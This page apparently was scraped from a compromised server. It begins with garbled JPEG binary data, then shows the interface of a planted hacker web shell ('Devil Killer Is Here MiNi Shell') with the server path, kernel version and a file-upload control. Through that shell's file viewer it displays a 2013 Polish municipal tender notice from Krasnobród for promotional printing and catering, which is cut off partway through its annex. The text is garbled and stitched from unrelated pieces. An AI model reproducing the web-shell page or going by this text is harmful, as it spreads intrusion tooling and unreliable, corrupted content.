JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/65839-N-2013.html

<p class="kh_header"><b>Krasnobród: wykonanie usług związanych z promocją niżej wymienionych projektów:


- Rozbudowa infrastruktury turystycznej w Krasnobrodzie etap II. (Projekt nr 06/10-WND-RPLU.07.01.00-06-043/10).  
- Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. (Projekt nr 02/08-WND-RPLU.05.02.00-06-152/08).
- Zintegrowany system gospodarki odpadami Gminy Krasnobród. (Projekt nr 04/10-WND-RPLU.06.01.00-06-038/10).</b><br>
<b>Numer ogłoszenia: 65839 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krasnobród , ul. 3 Maja 36, 22-440 Krasnobród, woj. lubelskie, tel. 0-84 660 7691, faks 0-84 660 7692.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnobrod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie usług związanych z promocją niżej wymienionych projektów:


- Rozbudowa infrastruktury turystycznej w Krasnobrodzie etap II. (Projekt nr 06/10-WND-RPLU.07.01.00-06-043/10).  
- Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. (Projekt nr 02/08-WND-RPLU.05.02.00-06-152/08).
- Zintegrowany system gospodarki odpadami Gminy Krasnobród. (Projekt nr 04/10-WND-RPLU.06.01.00-06-038/10)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług związanych z promocją niżej wymienionych projektów:

- Rozbudowa infrastruktury turystycznej w Krasnobrodzie etap II. (Projekt nr 06/10-WND-RPLU.07.01.00-06-043/10).  
- Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. (Projekt nr 02/08-WND-RPLU.05.02.00-06-152 / 08).
- Zintegrowany system gospodarki odpadami Gminy Krasnobród. (Projekt nr 04/10-WND-RPLU.06.01.00-06-038 / 10).


 ZAKRES RZECZOWY USŁUG:

Część zamówienia nr 1 

Jednokrotna emisja w prasie lokalnej lub regionalnej trzech artykułów promujących projekty:
a) Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II.
b) Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
c) Zintegrowany system gospodarki odpadami Gminy Krasnobród. 
zakres części zamówienia: (emisja trzech artykułów promocyjnych o wielkości do 20 modułów każdy )

Część zamówienia nr 2

1. Przygotowanie projektu oraz wydruk  kalendarza ściennego trójdzielnego z fotografią inwestycji zrealizowanej w ramach projektu: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
2. Przygotowanie projektu oraz wydruk foldera promującego projekt Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II: 
3. Przygotowanie projektu oraz wydruk bannera promującego projekt Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II.
zakres cześci zamówienia: (wydanie kalendarzy -250 sztuk, wydanie foldera - 20 000sztuk, banner - 1 szt.)

Część zamówienia nr 3 

1. Opracowanie książeczki reklamowej (kolorowanki) promującej projekt pod nazwą: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
2. Opracowanie oraz wydruk książeczki reklamowej (kolorowanki) promującej projekt pod nazwą: Zintegrowany system gospodarki odpadami Gminy Krasnobród. 
zakres części zamówienia: (dwie książeczki w formacie PDF, wydruk jednego rodzaju książeczki: 300 sztuk). 
Część zamówienia nr 4 

Wydanie broszury z płytą kompaktową promującą projekt: Zintegrowany system gospodarki odpadami Gminy Krasnobród. 
zakres części zamówienia: (wydruk broszury 400 sztuk, wytłoczenie płyt CD -400 sztuk)

Część zamówienia nr 5

Usługi gastronomiczne kateringowe związane z promocją projektów:
1) Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II.
2) Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
Zakres części zamówienia: (Organizacja stołu szwedzkiego dla 40 osób, organizacja stołu szwedzkiego na 50 osob, posiłki regeneracyjne dla wolontariuszy - 46 zestawów).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w częściach zamówienia nr 2 nr  3, nr 4. Zamówienie uzupełniające może stanowić nie więcej niż  50 % wartości zamówienia podstawowego i polegać będzie  na powtórzeniu zamówień z zakresu usług  zgodnych z przedmiotem zamówienia podstawowego.
W części zamówienia nr 2 zamówienie uzupełniające będzie dotyczyć dodruku kalendarza ściennego trójdzielnego z fotografią inwestycji zrealizowanej w ramach projektu: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
W części zamówienia nr 3 zamówienie uzupełniające będzie dotyczyć dodruku książeczki reklamowej (kolorowanki) promującej projekt pod nazwą: Zintegrowany system gospodarki odpadami Gminy Krasnobród.
W części zamówienia nr 4 zamówienie uzupełniające będzie dotyczyć dodruku broszury z płytą kompaktową promującą projekt: Zintegrowany system gospodarki odpadami Gminy Krasnobród.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.82.30.00-9, 79.97.00.00-4, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie w żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W części zamówienia nr 1 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
W części zamówienia nr 2 Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeśli udokumentuje się zrealizowaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: przynajmniej jednej usługi związanej z zaprojektowaniem oraz wydaniem  kalendarza ściennego oraz przynajmniej jednej usługi związanej z opracowaniem i wydrukiem  foldera reklamowego lub broszury reklamowej lub innej publikacji  reklamowej. Wartość  wykazanej usługi związanej z zaprojektowaniem oraz wydaniem  kalendarza ściennego nie może być mniejsza niż 3.000,00 zł brutto. Wartość  wykazanej usługi związanej z opracowaniem i wydrukiem  foldera reklamowego lub broszury reklamowej lub innej publikacji  reklamowej nie może być mniejsza niż 3.000,00 zł brutto.
Ocena sposobu spełniania warunku przez wykonawcę przeprowadzona zostanie na podstawie załączonych dokumentów metodą spełnia - nie spełnia.
W części zamówienia nr 3 Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeśli udokumentuje się zrealizowaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: przynajmniej jednej usługi  związanej z opracowaniem i wydrukiem książeczki kolorowanki dla dzieci. Wartość  wykazanej usługi nie może być mniejsza niż 2.000,00 zł brutto. 
 Ocena sposobu spełniania warunku przez wykonawcę przeprowadzona zostanie na podstawie załączonych dokumentów metodą spełnia - nie spełnia.

W części zamówienia nr 4 Wykonawca spełni warunek posiadania wiedzy i doświadczenia jeśli udokumentuje się zrealizowaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: przynajmniej jednej usługi związanej z wydaniem publikacji (broszury) reklamowej zawierającej płytę CD lub DVD. Wartość  wykazanej usługi nie może być mniejsza niż 3.000,00 zł brutto.
Ocena sposobu spełniania warunku przez wykonawcę przeprowadzona zostanie na podstawie załączonych dokumentów metodą spełnia - nie spełnia.

W części zamówienia nr 5 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie w żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie w żadnej z części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie w żadnej z części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu lub dokumentów potwierdzających, że nie otwarto likwidacji ani nie ogłoszono upadłości wykonawcy zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.  

Dokument zawierający oświadczenie powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

Dowodami potwierdzającymi należyte wykonanie lub wykonywanie usług mogą być:
1) Poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
2) Oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa w punkcie 1.
 Wykonawca w miejsce poświadczeń o których mowa w pkt.1 może przedkładać dokumenty potwierdzające należyte wykonanie usług określone w paragrafie 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W umowie na Część zamówienia nr 1 
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
1.Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 
2.Konieczności zmiany terminu realizacji w związku z:
a)działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 
c) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego materiałów - to jest fotografii i tekstów artykułów promocyjnych do których udostępnienia Wykonawcy Zamawiający zobowiązał się w umowie z Wykonawcą. 
W umowie na Część zamówienia nr 2 
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
1. Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
2. Konieczności zmiany terminu realizacji w związku z:
a) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego 
        
W umowie na Część zamówienia nr 3 
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
1.Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 
2.Konieczności zmiany terminu realizacji w związku z:
       a)   działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 
       b) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego materiałów niezbędnych Wykonawcy do zrealizowania przedmiotu zamówienia - to jest dobrej jakości fotografii, propozycji tematycznych kart do kolorowania i gotowych opracowań tekstowych, do których udostępnienia Wykonawcy Zamawiający zobowiązał się w umowie z Wykonawcą. 
W umowie na Część zamówienia nr 4
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
1.Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 
2.Konieczności zmiany terminu realizacji w związku z:
a)działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 
       c) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego materiałów niezbędnych Wykonawcy do zrealizowania przedmiotu zamówienia - to jest  fotografii sprzętu komunalnego będącego w posiadaniu Zamawiającego a który zaangażowany jest w zintegrowanym systemie gospodarki odpadami Gminy Krasnobród, gotowych opracowań tekstowych do których udostępnienia Wykonawcy Zamawiający zobowiązał się w umowie z Wykonawcą.
W umowie na Część zamówienia nr 5
Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach:
1.	Gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 
2. Konieczności zmiany terminu realizacji w związku z:
a)	działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 
b)	 zmianą terminów przeprowadzenia konferencji podsumowujących projekty oraz festynu które są dofinansowywane z EFRR.   
c)	zmianie ilości wydawanych posiłków dla wolontariuszy w przypadku gdy ilość wolontariuszy będzie mniejsza niż wskazana w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krasnobrod.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krasnobrodzie
ul. 3 Maja 36
22-440 Krasnobród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 14:25, miejsce: Sekretariat Urzędu Miejskiego w Krasnobrodzie
ul. 3 Maja 36
22-440 Krasnobród.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej jest dofinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego Oś priorytetowa V TRANSPORT działanie 5.2. Lokalny układ transportowy. Projekt pod nazwą: Rozbudowa Infrastruktury Turystycznej w Krasnobrodzie  etap II jest dofinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego Oś priorytetowa VII. Kultura, turystyka i współpraca międzyregionalna. Działanie 7.1.  Infrastruktura kultury i turystyki. 
Projekt pod nazwą: Zintegrowany system gospodarki odpadami Gminy Krasnobród jest dofinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego Oś priorytetowa VI. Środowisko i czysta energia Działanie:6.1. Ochrona i kształtowanie środowiska I Kat. II. Gospodarka odpadami i ochrona powierzchni ziemi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część zamówienia nr 1 

Jednokrotna emisja w prasie lokalnej lub regionalnej trzech artykułów promujących projekty:
a) Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II.
b) Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
c) Zintegrowany system gospodarki odpadami Gminy Krasnobród..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres części zamówienia: (emisja trzech artykułów promocyjnych o wielkości do 20 modułów każdy ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1.Przygot. projektu oraz wydruk  kalendarza ściennego trójdzielnego z fotografią inwestycji zrealizowanej w ramach projektu: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
2.Przygot. projektu oraz wydruk foldera promującego projekt Rozbudowa Infrastruktury turystycznej w Krasnobrodzie etap II: 
3.Przygot. projektu oraz wydruk bannera promującego projekt Rozbud. Infrastrukt. turyst. w Krasnobrodz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres części zamówienia: (wydanie kalendarzy -250 sztuk, wydanie foldera - 20 000sztuk, banner - 1 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.82.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 1. Opracowanie książeczki reklamowej (kolorowanki) promującej projekt pod nazwą: Podniesienie atrakcyjności otoczenia turystyki na terenie Krasnobrodu poprzez rozbudowę i modernizację infrastruktury technicznej. 
2. Opracowanie oraz wydruk książeczki reklamowej (kolorowanki) promującej projekt pod nazwą: Zintegrowany system gospodarki odpadami Gminy Krasnobród..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres części zamówienia: ( dwie książeczki w formacie PDF, wydruk jednego rodzaju książeczki: 300 sztuk)..</p></li>
